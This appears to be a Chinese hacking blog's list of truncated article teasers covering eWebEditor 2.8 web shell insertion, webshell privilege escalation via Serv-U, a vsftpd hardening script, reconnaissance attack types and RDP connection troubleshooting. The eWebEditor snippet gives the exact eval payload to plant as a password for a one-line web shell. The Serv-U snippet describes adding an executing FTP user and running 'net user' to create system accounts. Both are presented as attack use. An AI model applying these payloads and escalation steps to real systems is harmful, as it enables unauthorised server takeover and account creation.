-
ewebeditor 2.8 后台插马
ewebeditor 2.8 后台插上一句话影响版本:2.8 商业版攻击利用:登陆后台,点击修改密码—新密码设置为 1″:eval request(“a”)’设置成功后,访问htt...
-
架设安全vsftpd服务器的脚本
在实际工作中,可用以下脚本架设一台很安全的内部FTP服务器;当然也可以配合Wireshark理解vsftpd的被动与主动的区别,以本机192.168.0.18为例,脚本如下:#!/bin/bashiptables -Fiptables -X...
-
webshell提权总结
1.webshell提权之Serv-U添加数据法找到Sserv-u的目录里的ServUDaemon.ini文件进行修改,添加一个有执行权限的用户。然后登陆ftp添加系统账号:quote site exec net user用户名密码 /ad...
-
信息收集型攻击与假消息攻击介绍
黑客信息收集型攻击是目前非常主流的一种攻击形式,信息收集型攻击并不对目标本身造成危害,如名所示这类黑客攻击被用来为进一步入侵提供有用的信息。而假消息攻击是用于攻击目标配置不正确的消息,主要包括:扫描技术、体系结构刺探、利用信息服务。 黑客...
-
3389无法连接的5种原因
1、服务器在内网。2、做了tcp/ip筛选。先执行下面cmd命令:cmd /c regedit -e c:\1.reg HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Tcpip,导出注册表...
